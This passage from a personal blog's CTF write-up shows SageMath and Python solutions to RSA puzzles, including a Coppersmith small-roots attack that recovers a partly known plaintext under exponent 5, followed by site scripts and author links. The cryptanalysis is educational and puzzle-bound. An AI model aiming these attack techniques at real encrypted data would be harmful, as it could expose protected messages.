</span></span><span class="line"><span class="cl"><span class="n">d</span> <span class="o">=</span> <span class="n">invert</span><span class="p">(</span><span class="n">e</span><span class="p">,</span><span class="n">phi</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">hint2</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">c</span><span class="p">,</span><span class="n">d</span><span class="p">,</span><span class="n">n</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># print(hint2)</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">hint2</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="s1">&#39;&#39;&#39;
</span></span></span><span class="line"><span class="cl"><span class="s1">Flag is a 764-length number that starts with &#34;11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s1">and CYZ says he can solve the problem if he was given two more numbers
</span></span></span><span class="line"><span class="cl"><span class="s1">&#39;&#39;&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># --------------challenge 3-------------</span>
</span></span><span class="line"><span class="cl"><span class="n">e</span> <span class="o">=</span> <span class="mi">5</span>
</span></span><span class="line"><span class="cl"><span class="n">n</span> <span class="o">=</span> <span class="mi">14857387925078594782296815160632343246361073432459148990826882280149636079353743233970188012712079179396872746334143946166398665205889211414809061990804629906990919975187761209638578624750977626427334126665295876888197889611807587476285991599511809796600855689969285611439780660503760599419522224129074956376232480894299044645423966132497814477710701209588359243945406653547034819927990978087967107865071898215805154003530311865483912924517801551052430227039259201082691698480830966567550828053196299423168934840697637891311424286534363837640448614727396254288829197614805073711893711252067987576745683317789020760081</span>
</span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="mi">14035143725862612299576867857272911865951893239411969382153274945929406881665641140566462510177132511558933111728871930062074990934496715765999564244916409345156132996227113853067808126894818934327468582686975383715892108247084995817427624992232755966398834682079985297050358462588989699096264155802168300026093598601350106309023915300973067720164567785360383234519093637882582163398344514810028120555511836375795523327469278186235781844951253058134566846816114359878325011207064300185611905609820210904126312524631330083758585084521500322528017455972299008481301204209945411774541553636405290572228575790342839240414</span>
</span></span><span class="line"><span class="cl"><span class="s1">&#39;&#39;&#39;
</span></span></span><span class="line"><span class="cl"><span class="s1"># sagemath
</span></span></span><span class="line"><span class="cl"><span class="s1">m_high = 11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047
</span></span></span><span class="line"><span class="cl"><span class="s1">R.&lt;x&gt; = PolynomialRing(Zmod(n))
</span></span></span><span class="line"><span class="cl"><span class="s1">f = (m_high * (10**54)+ x) ** 5 - c
</span></span></span><span class="line"><span class="cl"><span class="s1">solve = f.monic().small_roots(X=2 ^ 200, beta=1)
</span></span></span><span class="line"><span class="cl"><span class="s1">x = solve[0]
</span></span></span><span class="line"><span class="cl"><span class="s1"># 这里在线sage跑出来会错，直接打印x然后贴回来就好
</span></span></span><span class="line"><span class="cl"><span class="s1">flag = (m_high * (10**54)+ x)
</span></span></span><span class="line"><span class="cl"><span class="s1">print(x)
</span></span></span><span class="line"><span class="cl"><span class="s1">&#39;&#39;&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">flag</span> <span class="o">=</span> <span class="mi">11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047675003330981130439478093707252121278358852500850751357</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">flag</span><span class="p">))</span>
</span></span></code></pre></td></tr></table>
</div>
</div>
    </article>
    
    
<script defer src="/js/clipboard.min.c168d3a04c45a631be76437054619a4a3b30107960cb9730be96012fef5762b0.js"></script>

<script defer src="/js/helper/prev.min.js"></script>

<script defer src="/js/helper/prop.min.js"></script>
<script>
  'use strict';
  document.addEventListener('DOMContentLoaded', function () {
    
    var clipInit = false;
    var preChromaElem = document.querySelectorAll('pre.chroma');
    var langCodeElem = document.querySelectorAll('.language-code');
    var dollarCodeElem = document.querySelectorAll('div.language-\\$');
    var gtCodeElem = document.querySelectorAll('div.language-\\>');

    var makeClipboard = function(elem) {
      var code = elem,
          text = elem.textContent;
        
      if (text.length > 15) {
        if (!clipInit) {
          var text, clip = new ClipboardJS('.copy-to-clipboard', {
            text: function (trigger) {
              var codeElem = prev(trigger).querySelectorAll('code');
              if (codeElem.length > 1) {
                text = prev(trigger).querySelector('code[class^="language-"]').textContent;
              } else {
                text = prev(trigger).querySelector('code').textContent;
              }

              return text.replace(/^\$\s/gm, '');
            }
          });

          var inPre;
          clip.on('success', function (e) {
            e.clearSelection();
            inPre = prop(e.trigger.parentNode, 'tagName') == 'PRE';
            e.trigger.setAttribute('aria-label', 'Copied to clipboard!');
            e.trigger.classList.add('tooltipped');
            e.trigger.classList.add('tooltipped-w');
          });

          clip.on('error', function (e) {
            inPre = prop(e.trigger.parentNode, 'tagName') == 'PRE';
            e.trigger.setAttribute('aria-label', e.action.toString());
            e.trigger.classList.add('tooltipped');
            e.trigger.classList.add('tooltipped-w');
          });

          clipInit = true;
        }

        var notAllowedClass = ['language-mermaid', 'language-viz', 'language-wave', 'language-chart', 'language-msc', 'language-flowchart'];
        var isNotAllowedIncluded = false;
        var curClassName = code.getAttribute('class');

        for (var i = 0; i < notAllowedClass.length; i++) {
          if (curClassName && curClassName.startsWith(notAllowedClass[i])) {
            isNotAllowedIncluded = true;
            break;
          }
        }

        if (!isNotAllowedIncluded) {
          if (curClassName) {
            var newClipboardElem = document.createElement('span');
            newClipboardElem.setAttribute('class', 'copy-to-clipboard');
            newClipboardElem.setAttribute('title', 'Copy to clipboard');
            elem.parentNode.parentNode.insertBefore(newClipboardElem, elem.parentNode.nextElementSibling);
          }
        }
      }
    }

    var makeSymbolClipboard = function(elem) {
      var clipboardSpan = document.createElement('span');
      clipboardSpan.setAttribute('class', 'copy-to-clipboard');
      clipboardSpan.setAttribute('title', 'Copy to clipboard');
      elem.parentNode.parentNode.insertBefore(clipboardSpan, elem.parentNode.nextElementSibling);
    }

    preChromaElem ? 
    preChromaElem.forEach(function(elem) {
      elem.querySelectorAll('code').forEach(function(codeElem) {
        makeClipboard(codeElem);
      });
    }) : null;
    
    langCodeElem ? 
    langCodeElem.forEach(function(elem) {
      elem.querySelectorAll('code').forEach(function (codeElem) {
        makeClipboard(codeElem);
      });
    }) : null;

    dollarCodeElem ? 
    dollarCodeElem.forEach(function(elem) {
      elem.querySelectorAll('code').forEach(function (codeElem) {
        makeSymbolClipboard(codeElem);
      });
    }) : null;

    gtCodeElem ?
    gtCodeElem.forEach(function(elem) {
      elem.querySelectorAll('code').forEach(function (codeElem) {
        makeSymbolClipboard(codeElem);
      });
    }) : null;
    
  });
</script>
    <script>
  'use strict';
  
  function wrap(el, wrapper) {
    el.parentNode.insertBefore(wrapper, el);
    wrapper.appendChild(el);
  }

  (function () {
    var singleContentsElem = document.querySelector('.single__contents');
    singleContentsElem ? 
    singleContentsElem.querySelectorAll('pre > code').forEach(function(elem) {
      var dataLang = elem.getAttribute('data-lang');
      var dataLangWrapper = document.createElement('div');
      var code = null;
      var codeTitle = null;

      if (dataLang && dataLang.includes(':')) {
        code = dataLang.split(':')[0];
        codeTitle = dataLang.split(':')[1];

        dataLangWrapper.className = 'language-' + code;
        dataLangWrapper.setAttribute('data-lang', codeTitle);

        elem.className = 'language-' + code;
        elem.setAttribute('data-lang', codeTitle);
        elem.setAttribute('id', codeTitle);
      } else if (!dataLang) {
        dataLangWrapper.setAttribute('data-lang', 'Code');
        dataLangWrapper.className = 'language-code';
      }

      if (!dataLang || codeTitle) {
        wrap(elem.parentNode, dataLangWrapper);
      }

    }) : null;
  })();

  var langCodeElem = document.querySelectorAll('.language-code');
  langCodeElem ? langCodeElem.forEach(function (elem) {
    var newElem = document.createElement('span');
    newElem.className = 'copy-to-clipboard';
    newElem.setAttribute('title', 'Copy to clipboard');
    elem.append(newElem);
  }) : null;
  

  

  
  var dollarCodeElem = document.querySelectorAll('div.language-\\$');
  var gtCodeElem = document.querySelectorAll('div.language-\\>');

  dollarCodeElem ?
  dollarCodeElem.forEach(function(elem) {
    var lnts = elem.parentNode.parentNode ? elem.parentNode.parentNode.querySelectorAll('.lnt') : null;
    lnts ? 
    lnts.forEach(function(lnt) {
      lnt.innerHTML = '$<br/>';
    }) : null;
  }) : null;

  gtCodeElem ?
  gtCodeElem.forEach(function(elem) {
    var lnts = elem.parentNode.parentNode ? elem.parentNode.parentNode.querySelectorAll('.lnt') : null;
    lnts ? 
    lnts.forEach(function(lnt) {
      lnt.innerHTML = '><br/>';
    }) : null;
  }) : null;
  
</script>
    
<div class="donation">
  <div class="donation__message">
    Share on
  </div>
  <div class="donation__icons">
    
    
    
      
    
      
    
  </div>
</div>


    
    
<div class="whoami__gutter"></div>
<hr class="hr-slash whoami-hr"/>
<section class="whoami">
  <div class="whoami__image-wrapper">
    
    
      
        <img data-src="/images/whoami/avatar.jpg" src="data:image/svg+xml,%0A%3Csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24' viewBox='0 0 24 24'%3E%3Cpath fill='none' d='M0 0h24v24H0V0z'/%3E%3Cpath fill='%23aaa' d='M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-1 16H6c-.55 0-1-.45-1-1V6c0-.55.45-1 1-1h12c.55 0 1 .45 1 1v12c0 .55-.45 1-1 1zm-4.44-6.19l-2.35 3.02-1.56-1.88c-.2-.25-.58-.24-.78.01l-1.74 2.23c-.26.33-.02.81.39.81h8.98c.41 0 .65-.47.4-.8l-2.55-3.39c-.19-.26-.59-.26-.79 0z'/%3E%3C/svg%3E" alt="ruokeqx" class="lazyload whoami__image"/>
      
    
  </div>
  <div class="whoami__contents">
    <div class="whoami__written-by">
      WRITTEN BY
    </div>
    <div class="whoami__title">
      
        ruokeqx
      
    </div>
    <div class="whoami__desc">
      
        
      
    </div>
    <div class="whoami__social">
      
      
      
      
      
      
      
      
      <a href="ruokeqx@163.com" title="email" aria-label="email">
        <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path fill="currentColor" d="M20 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm-.4 4.25l-7.07 4.42c-.32.2-.74.2-1.06 0L4.4 8.25c-.25-.16-.4-.43-.4-.72 0-.67.73-1.07 1.3-.72L12 11l6.7-4.19c.57-.35 1.3.05 1.3.72 0 .29-.15.56-.4.72z"/></svg>
      </a>
      
      
      
      
      
      
      
      <a href="https://github.com/ruokeqx" title="github" aria-label="github">
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="25" height="25" viewBox="0 0 24 24" version="1.1">
<g id="surface3680">
<path fill="currentColor" d="M 10.898438 2.101562 C 6.300781 2.601562 2.601562 6.300781 2.101562 10.800781 C 1.601562 15.5 4.300781 19.699219 8.398438 21.300781 C 8.699219 21.398438 9 21.199219 9 20.800781 L 9 19.199219 C 9 19.199219 8.601562 19.300781 8.101562 19.300781 C 6.699219 19.300781 6.101562 18.101562 6 17.398438 C 5.898438 17 5.699219 16.699219 5.398438 16.398438 C 5.101562 16.300781 5 16.300781 5 16.199219 C 5 16 5.300781 16 5.398438 16 C 6 16 6.5 16.699219 6.699219 17 C 7.199219 17.800781 7.800781 18 8.101562 18 C 8.5 18 8.800781 17.898438 9 17.800781 C 9.101562 17.101562 9.398438 16.398438 10 16 C 7.699219 15.5 6 14.199219 6 12 C 6 10.898438 6.5 9.800781 7.199219 9 C 7.101562 8.800781 7 8.300781 7 7.601562 C 7 7.199219 7 6.601562 7.300781 6 C 7.300781 6 8.699219 6 10.101562 7.300781 C 10.601562 7.101562 11.300781 7 12 7 C 12.699219 7 13.398438 7.101562 14 7.300781 C 15.300781 6 16.800781 6 16.800781 6 C 17 6.601562 17 7.199219 17 7.601562 C 17 8.398438 16.898438 8.800781 16.800781 9 C 17.5 9.800781 18 10.800781 18 12 C 18 14.199219 16.300781 15.5 14 16 C 14.601562 16.5 15 17.398438 15 18.300781 L 15 20.898438 C 15 21.199219 15.300781 21.5 15.699219 21.398438 C 19.398438 19.898438 22 16.300781 22 12.101562 C 22 6.101562 16.898438 1.398438 10.898438 2.101562 Z M 10.898438 2.101562 "/>
</g>
</svg>

      </a>
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
    </div>
  </div>
</section>
<hr class="hr-slash whoami-hr" />


    <section class="related">
    
    
    <h1 class="related__title">
      <hr class="hr-dots"/>
      <div>
        See Also
      </div>
      <hr class="hr-dots"/>
    </h1>
    <ul class="related-ul">
        
        <li>
          <a href="/posts/geek11/" class="related__link">第十一届极客大挑战Misc、Crypto题解</a>
        </li>
        
        <li>
          <a href="/posts/ctfhub_wp/" class="related__link">ctfhub writeup</a>
        </li>
        
        <li>
          <a href="/posts/buuctf-rsa/" class="related__link">BUUCTF RSA相关题目题解</a>
        </li>
        
        <li>
          <a href="/posts/my_first_awd/" class="related__link">记人生第一次AWD</a>
        </li>
        
        <li>
          <a href="/posts/code_auditing/" class="related__link">bugku代码审计</a>
        </li>
        
    </ul>
    
  </section>
    <div class="grow"></div>
<nav class="pagination-single">
  
    
      <a href="https://ruokeqx.gitee.io/posts/geek11/" class="pagination-single__left">
        <div class="pagination-single__icon">
          <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path fill="currentColor" d="M19 11H7.83l4.88-4.88c.39-.39.39-1.03 0-1.42-.39-.39-1.02-.39-1.41 0l-6.59 6.59c-.39.39-.39 1.02 0 1.41l6.59 6.59c.39.39 1.02.39 1.41 0 .39-.39.39-1.02 0-1.41L7.83 13H19c.55 0 1-.45 1-1s-.45-1-1-1z"/></svg>
        </div>
        <div class="pagination-single__left-title">第十一届极客大挑战Misc、Crypto题解</div>      
      </a>
    
    <div class="grow"></div>
    
      <a href="https://ruokeqx.gitee.io/posts/machine-learning-andrew-ng-stanford/" class="pagination-single__right">      
        <div class="pagination-single__right-title">CS229 Machine Learning——Andrew Ng——Stanford</div>
        <div class="pagination-single__icon">
          <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path fill="currentColor" d="M5 13h11.17l-4.88 4.88c-.39.39-.39 1.03 0 1.42.39.39 1.02.39 1.41 0l6.59-6.59c.39-.39.39-1.02 0-1.41l-6.58-6.6c-.39-.39-1.02-.39-1.41 0-.39.39-.39 1.02 0 1.41L16.17 11H5c-.55 0-1 .45-1 1s.45 1 1 1z"/></svg>
        </div>
      </a>
    
  
</nav>
    
    <div class="modal micromodal-slide" id="modal" aria-hidden="true">
  <div class="modal__overlay" tabindex="-1" data-micromodal-close>
    <div class="modal__container" role="dialog" aria-modal="true" aria-labelledby="modal-title">
      
      <div class="modal__content" id="modal-content">
        <div id="mySwipe" class="swipe">
          <div class="swipe-wrap">
          </div>
        </div>
      </div>

      <span class="modal__items">
        
        <span class="modal__header">
          <div class="modal__paging" title="Page Info" aria-label="Current Page">
          </div>
          <div class="modal__icon modal__toolbar modal__toolbar--close" title="Close" aria-label="Close Button" data-micromodal-close>
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 26 26" width="25" height="25"><path fill="currentColor" d="M 21.734375 19.640625 L 19.636719 21.734375 C 19.253906 22.121094 18.628906 22.121094 18.242188 21.734375 L 13 16.496094 L 7.761719 21.734375 C 7.375 22.121094 6.746094 22.121094 6.363281 21.734375 L 4.265625 19.640625 C 3.878906 19.253906 3.878906 18.628906 4.265625 18.242188 L 9.503906 13 L 4.265625 7.761719 C 3.882813 7.371094 3.882813 6.742188 4.265625 6.363281 L 6.363281 4.265625 C 6.746094 3.878906 7.375 3.878906 7.761719 4.265625 L 13 9.507813 L 18.242188 4.265625 C 18.628906 3.878906 19.257813 3.878906 19.636719 4.265625 L 21.734375 6.359375 C 22.121094 6.746094 22.121094 7.375 21.738281 7.761719 L 16.496094 13 L 21.734375 18.242188 C 22.121094 18.628906 22.121094 19.253906 21.734375 19.640625 Z"/></svg>
          </div>
          <div class="modal__icon modal__toolbar modal__toolbar--full" title="Full Screen" aria-label="Full Screen Button">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="25" height="25"><path fill="currentColor" d="M 5 3 C 3.9069372 3 3 3.9069372 3 5 L 3 8 A 1.0001 1.0001 0 1 0 5 8 L 5 5 L 8 5 A 1.0001 1.0001 0 1 0 8 3 L 5 3 z M 16 3 A 1.0001 1.0001 0 1 0 16 5 L 19 5 L 19 8 A 1.0001 1.0001 0 1 0 21 8 L 21 5 C 21 3.9069372 20.093063 3 19 3 L 16 3 z M 3.984375 14.986328 A 1.0001 1.0001 0 0 0 3 16 L 3 19 C 3 20.093063 3.9069372 21 5 21 L 8 21 A 1.0001 1.0001 0 1 0 8 19 L 5 19 L 5 16 A 1.0001 1.0001 0 0 0 3.984375 14.986328 z M 19.984375 14.986328 A 1.0001 1.0001 0 0 0 19 16 L 19 19 L 16 19 A 1.0001 1.0001 0 1 0 16 21 L 19 21 C 20.093063 21 21 20.093063 21 19 L 21 16 A 1.0001 1.0001 0 0 0 19.984375 14.986328 z"/></svg>
          </div>
          <div class="modal__icon modal__toolbar modal__toolbar--normal" title="Normal Screen" aria-label="Normal Screen Button">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50" width="25" height="25"><path fill="currentColor" d="M 16.96875 4.972656 C 15.867188 4.988281 14.984375 5.894531 15 7 L 15 15 L 7 15 C 6.277344 14.988281 5.609375 15.367188 5.246094 15.992188 C 4.878906 16.613281 4.878906 17.386719 5.246094 18.007813 C 5.609375 18.632813 6.277344 19.011719 7 19 L 19 19 L 19 7 C 19.007813 6.460938 18.796875 5.941406 18.414063 5.558594 C 18.03125 5.175781 17.511719 4.964844 16.96875 4.972656 Z M 32.96875 4.972656 C 31.921875 4.988281 31.0625 5.8125 31.003906 6.859375 C 31 6.90625 31 6.953125 31 7 L 31 19 L 43 19 C 43.066406 19 43.132813 19 43.199219 18.992188 C 44.269531 18.894531 45.070313 17.972656 45.015625 16.902344 C 44.964844 15.828125 44.074219 14.988281 43 15 L 35 15 L 35 7 C 35.007813 6.460938 34.796875 5.941406 34.414063 5.558594 C 34.03125 5.175781 33.511719 4.964844 32.96875 4.972656 Z M 7 31 C 6.277344 30.988281 5.609375 31.367188 5.246094 31.992188 C 4.878906 32.613281 4.878906 33.386719 5.246094 34.007813 C 5.609375 34.632813 6.277344 35.011719 7 35 L 15 35 L 15 43 C 14.988281 43.722656 15.367188 44.390625 15.992188 44.753906 C 16.613281 45.121094 17.386719 45.121094 18.007813 44.753906 C 18.632813 44.390625 19.011719 43.722656 19 43 L 19 31 Z M 31 31 L 31 43 C 30.988281 43.722656 31.367188 44.390625 31.992188 44.753906 C 32.613281 45.121094 33.386719 45.121094 34.007813 44.753906 C 34.632813 44.390625 35.011719 43.722656 35 43 L 35 35 L 43 35 C 43.722656 35.011719 44.390625 34.632813 44.753906 34.007813 C 45.121094 33.386719 45.121094 32.613281 44.753906 31.992188 C 44.390625 31.367188 43.722656 30.988281 43 31 Z"/></svg>
          </div>
        </span>
        
        <div class="modal__icon modal__arrow modal__arrow--left" title="Arrow Left" aria-label="Arrow Left Button">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 26 26" width="28" height="28"><path fill="currentColor" d="M 23.28125 11 L 10 10 L 10 6.851563 C 10 6.523438 9.839844 6.277344 9.519531 6.03125 C 9.199219 5.949219 8.878906 5.949219 8.640625 6.113281 C 5.359375 8.410156 2.238281 12.257813 2.160156 12.421875 C 2.082031 12.578125 2.007813 12.8125 2.003906 12.976563 C 2.003906 12.980469 2 12.988281 2 12.992188 C 2 13.15625 2.078125 13.402344 2.160156 13.484375 C 2.238281 13.648438 5.28125 17.507813 8.640625 19.804688 C 8.960938 19.96875 9.28125 20.050781 9.519531 19.886719 C 9.839844 19.722656 10 19.476563 10 19.148438 L 10 16 L 23.28125 15 C 23.679688 14.679688 24 13.875 24 12.992188 C 24 12.195313 23.761719 11.320313 23.28125 11 Z"/></svg>
        </div>
        
        <div class="modal__icon modal__arrow modal__arrow--right" title="Arrow Right" aria-label="Arrow Right Button">

          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 26 26" width="28" height="28"><path fill="currentColor" d="M 2.71875 11.023438 L 16 10.023438 L 16 6.875 C 16 6.546875 16.160156 6.300781 16.480469 6.054688 C 16.800781 5.972656 17.121094 5.972656 17.359375 6.136719 C 20.640625 8.433594 23.761719 12.28125 23.839844 12.445313 C 23.917969 12.601563 23.992188 12.835938 23.996094 13 C 23.996094 13.003906 24 13.011719 24 13.015625 C 24 13.179688 23.921875 13.425781 23.839844 13.507813 C 23.761719 13.671875 20.71875 17.53125 17.359375 19.828125 C 17.039063 19.992188 16.71875 20.074219 16.480469 19.910156 C 16.160156 19.746094 16 19.5 16 19.171875 L 16 16.023438 L 2.71875 15.023438 C 2.320313 14.703125 2 13.898438 2 13.015625 C 2 12.21875 2.238281 11.34375 2.71875 11.023438 Z"/></svg>
        </div>

        <div class="modal__caption">
          <div class="modal__caption--text">
          </div>
        </div>

      </span>
    </div>
  </div>
</div>


<script defer src="/js/swipe.min.b5af2be70ffc9ba2e83412609aa18b5b025c69399f9e1dce09d444a636a38cd0.js"></script>

<script defer src="/js/micromodal.min.de01b44b2f383056bbcaf6ee921fd385d79108ec1129afd0eb2f3f5a07e11f45.js"></script>

<script defer src="/js/helper/fadeinout.min.js"></script>

<script>
document.addEventListener('DOMContentLoaded', function () {
  
   
  var docElem = document.documentElement;

   
  function openFullscreen() {
    if (docElem.requestFullscreen) {
      docElem.requestFullscreen();
    } else if (docElem.mozRequestFullScreen) {  
      docElem.mozRequestFullScreen();
    } else if (docElem.webkitRequestFullscreen) {  
      docElem.webkitRequestFullscreen();
    } else if (docElem.msRequestFullscreen) {  
      docElem.msRequestFullscreen();
    }
  }

   
  function closeFullscreen() {
    if (document.fullscreenElement ||
      document.webkitFullscreenElement ||
      document.mozFullScreenElement) {
      if (document.exitFullscreen) {
        document.exitFullscreen();
      } else if (document.mozCancelFullScreen) {  
        document.mozCancelFullScreen();
      } else if (document.webkitExitFullscreen) {  
        document.webkitExitFullscreen();
      } else if (document.msExitFullscreen) {  
        document.msExitFullscreen();
      }
    }
  }

  var modal = document.getElementById('modal');
  var galleryContainerElem = document.querySelector('.gallery__container');
  var swipeWrapElem = document.querySelector('.swipe-wrap');
  var mySwipeElem = document.getElementById('mySwipe');
  var arrowLeftElem = document.querySelector('.modal__arrow--left');
  var arrowRightElem = document.querySelector('.modal__arrow--right');
  var closeElem = document.querySelector('.modal__toolbar--close');
  var fullElem = document.querySelector('.modal__toolbar--full');
  var normalElem = document.querySelector('.modal__toolbar--normal');
  var captionElem = document.querySelector('.modal__caption');
  var pagingElem = document.querySelector('.modal__paging');
  var itemsElem = document.querySelector('.modal__items');
  var imgTotalNum = null;
  var myFadeTimeout = null;
  var mySwipe = null;
  var keydownFunction = function (e) {
    if (e.key === 'ArrowRight') {
      if (modal && modal.classList.contains('is-open')) {
        mySwipe.next();
      }
    } else if (e.key === 'ArrowLeft') {
      if (modal && modal.classList.contains('is-open')) {
        mySwipe.prev();
      }
    }
  }

  if (galleryContainerElem) {
    imgTotalNum = galleryContainerElem.querySelectorAll('img').length;
  } else {
    galleryContainerElem = document.querySelector('.single__contents');
    imgTotalNum = galleryContainerElem.querySelectorAll('img').length;
  }

  MicroModal.init({
    onClose: function () {
      if (mySwipe) {
        mySwipe.kill();
        mySwipe = null;
        closeFullscreen();
      }
      window.removeEventListener('keydown', keydownFunction);
    },
    disableScroll: true,
    disableFocus: true,
    awaitOpenAnimation: false,
    awaitCloseAnimation: false,
    debugMode: false,
  });

  var imageLoad = function(src) {
    return new Promise(function(resolve, reject) {
      var newImg = new Image;
      newImg.onload = function() {
        resolve(newImg);
      }
      newImg.onerror = reject;
      newImg.src = src;
    });
  }

  galleryContainerElem.querySelectorAll('img').forEach(function (elem, idx) {
    elem.style.cursor = 'pointer';

    var clonedElem = elem.cloneNode(true);
    clonedElem.style.maxHeight = '100%';
    clonedElem.style.maxWidth = '100%';
    clonedElem.onclick = function (e) {
      e.stopPropagation();
    }

    var wrapper = document.createElement('div');
    wrapper.style.width = '100%';
    wrapper.style.height = '100vh';
    wrapper.setAttribute('data-micromodal-close', '');
    wrapper.onclick = function () {
      if (mySwipe) {
        mySwipe.kill();
        mySwipe = null;
      }
    }
    wrapper.onmouseenter = function () {
      clearTimeout(myFadeTimeout);
      fadeIn(itemsElem, 200);
    };
    wrapper.onmouseleave = function () {
      myFadeTimeout = setTimeout(function () {
        fadeOut(itemsElem, 200);
      }, 2500);
    }
    wrapper.ontouchstart = function() {
      fadeIn(itemsElem, 200);
    }
    wrapper.append(clonedElem);
    swipeWrapElem.append(wrapper);

    elem.addEventListener('click', async function (e) {
      MicroModal.show('modal');
      if (mySwipe) {
        mySwipe.kill();
        mySwipe = null;
      }

      var imgSrc = e.target.getAttribute('data-src') || e.target.getAttribute('src');
      var img = await imageLoad(imgSrc);
      clonedElem.style.width = img.width + 'px';
      clonedElem.style.height = img.height + 'px';
      
      
      mySwipe = new Swipe(mySwipeElem, {
        startSlide: idx,
        draggable: true,
        autoRestart: false,
        continuous: false,
        disableScroll: true,
        stopPropagation: true,
        callback: async function (index, element) {
          
          var imgElem = element.querySelector('img');
          var imgSrc = imgElem.getAttribute('data-src') || imgElem.getAttribute('src');
          var img = await imageLoad(imgSrc);
          imgElem.style.width = img.width + 'px';
          imgElem.style.height = img.height + 'px';

          
          if (captionElem && imgElem) {
            var caption = null;
            if (imgElem.getAttribute('data-caption')) {
              caption = imgElem.getAttribute('data-caption');
            } else if (imgElem.getAttribute('title')) {
              caption = imgElem.getAttribute('title');
            } else if (imgElem.getAttribute('alt')) {
              caption = imgElem.getAttribute('alt');
            } else {
              caption = imgElem.getAttribute('src');
            }

            captionElem.querySelector('.modal__caption--text').innerText = caption;
            pagingElem.innerText = (index + 1) + ' / ' + imgTotalNum;

            clearTimeout(myFadeTimeout);
            fadeIn(itemsElem, 200);
          }
        },
      });

      fadeIn(itemsElem);

      
      if (captionElem) {
        var caption = null;
        if (e.target.getAttribute('data-caption')) {
          caption = e.target.getAttribute('data-caption');
        } else if (e.target.getAttribute('title')) {
          caption = e.target.getAttribute('title');
        } else if (e.target.getAttribute('alt')) {
          caption = e.target.getAttribute('alt');
        } else {
          caption = e.target.getAttribute('src');
        }

        captionElem.querySelector('.modal__caption--text').innerText = caption;
        pagingElem.innerText = (idx + 1) + ' / ' + imgTotalNum;
      }

      if (normalElem && fullElem) {
        normalElem.style.zIndex = -1;
        normalElem.style.opacity = 0;
        fullElem.style.zIndex = 25;
        fullElem.style.opacity = 1;
      }
    });

    window.addEventListener('keydown', keydownFunction);
  });

  arrowLeftElem ?
    arrowLeftElem.addEventListener('click', function (e) {
      if (mySwipe) {
        mySwipe.prev();
      }
    }) : null;
  arrowRightElem ?
    arrowRightElem.addEventListener('click', function (e) {
      if (mySwipe) {
        mySwipe.next();
      }
    }) : null;

  closeElem ?
    closeElem.addEventListener('click', function () {
      if (mySwipe) {
        mySwipe.kill();
        mySwipe = null;
      }
      closeFullscreen();
      MicroModal.close('modal');
    }) : null;

  fullElem ?
    fullElem.addEventListener('click', function (e) {
      openFullscreen();
      if (normalElem) {
        normalElem.style.zIndex = 25;
        normalElem.style.opacity = 1;
        fullElem.style.zIndex = -1;
        fullElem.style.opacity = 0;
      }
    }) : null;

  normalElem ?
    normalElem.addEventListener('click', function (e) {
      closeFullscreen();
      if (fullElem) {
        fullElem.style.zIndex = 25;
        fullElem.style.opacity = 1;
        normalElem.style.zIndex = -1;
        normalElem.style.opacity = 0;
      }
    }) : null;
  
});
</script>

    <div class="hide">
      

<div class="search">
  <span class="icon">
